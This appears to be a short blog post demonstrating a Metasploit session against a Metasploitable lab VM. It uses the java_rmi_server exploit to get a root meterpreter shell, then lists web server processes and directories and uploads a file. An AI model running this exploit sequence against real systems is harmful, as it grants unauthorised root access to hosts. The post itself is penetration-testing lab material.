meterpreter example | Web3us LLC

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(multi/misc/java_rmi_server) > exploit

...
msf exploit(multi/misc/java_rmi_server) > sessions -l

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  192.168.56.101:4444 -> 192.168.56.102:50674 (192.168.56.102)

msf exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1 created.
Channel 1 created.
ps -eaf | egrep '(http|apache)' | grep -v grep
root      4564     1  0 19:18 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4565  4564  0 19:18 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4567  4564  0 19:18 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4568  4564  0 19:18 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4573  4564  0 19:18 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  4575  4564  0 19:18 ?        00:00:00 /usr/sbin/apache2 -k start
cd /var/www
ls -al
total 84
drwxr-xr-x 10 www-data www-data  4096 Feb  8 23:28 .
drwxr-xr-x 15 root     root      4096 May 20  2012 ..
-rw-r--r--  1 www-data www-data   891 May 20  2012 index.php
drwxr-xr-x 10 www-data www-data  4096 May 14  2012 mutillidae
drwxr-xr-x 11 www-data www-data  4096 May 14  2012 phpMyAdmin
-rw-r--r--  1 www-data www-data    19 Apr 16  2010 phpinfo.php
drwxr-xr-x  3 www-data www-data  4096 May 14  2012 test
drwxrwxr-x 22 www-data www-data 20480 Apr 19  2010 tikiwiki
drwxrwxr-x 22 www-data www-data 20480 Apr 16  2010 tikiwiki-old
drwxr-xr-x  7 www-data www-data  4096 Apr 16  2010 twiki
upload jeff.txt
/bin/sh: line 5: upload: command not found
exit
meterpreter > cd /var/www
meterpreter > upload jeff.txt
[*] uploading  : jeff.txt -> jeff.txt
[*] Uploaded -1.00 B of 25.00 B (-4.0%): jeff.txt -> jeff.txt
[*] uploaded   : jeff.txt -> jeff.txt
meterpreter >

Popular

Summary: The Ideal Team Player

Blood on the Clock Tower Sects and Violets

Google Accounts and Backup codes

Tinkercad meshes are limited to 300,000 triangles

How to upgrade to python 3.7.1 on Fedora or Centos

Windows 10, 8, 7 password recovery with Kali or ISeePassword

Blood on the Clock Tower

Recent content

The Innovator's Dilemma

Summary - Personal Disruption Framework, S-Curve

Summary - 5 Love Languages

9 qualities that immediately make people respect you

Tinkercad meshes are limited to 300,000 triangles

How to convert media files - Rip DVDs

siege Web-site benchmark tool

Web Performance and Load Testing Tools for Linux

Data Breach Reports

Password Cracking